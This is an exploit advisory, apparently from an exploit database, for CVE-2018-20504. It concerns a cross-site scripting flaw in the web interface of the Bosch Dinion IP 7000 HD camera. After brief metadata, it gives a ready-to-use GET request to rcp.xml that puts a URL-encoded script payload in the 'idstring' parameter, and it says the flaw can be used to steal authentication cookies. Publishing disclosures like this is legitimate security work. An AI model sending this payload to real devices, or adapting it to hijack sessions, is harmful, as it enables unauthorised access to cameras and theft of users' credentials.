# BOSCH Dinion IP 7000 HD - Cross-Site Scripting
# Date: 2018-12-26
# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
# Contact: https://pentest.com.tr
# CVE: CVE-2018-20504
# Vendor Homepage: https://www.bosch.com/
# Device Guide: https://resource.boschsecurity.com/documents/DINION_IP_7000_HD_Installation_Manual_enUS_15869520011.pdf
# Model Version: 7000 HD
# Category: Webapps
# Tested on: Windows Server 2012 R2
# Software Description : DINION IP 7000 HD cameras are 1080p30 progressive
scan CMOS cameras that use the Bosch-designed digital imaging technology.
# Description : Exploiting these issues could allow an attacker to steal cookie-based authentication credentials,
# compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
# Vulnerabilities have been discovered during penetration testing.
# ==================================================================
# PoC:
# 'idstring' parameter running on "rcp.xml" contain XSS vulnerability.
# GET Request : /rcp.xml?command=0x0B89&type=T_WORD&direction=READ&num=1&idstring=sd_card_statuspd9q4%3ca%20xmlns%3aa%3d'http%3a%2f%2fwww.w3.org%2f1999%2fxhtml '%3e%3ca%3abody%20onload%3d'alert(1)'%2f%3e%3c%2fa%3el6mvv&_=1542292897080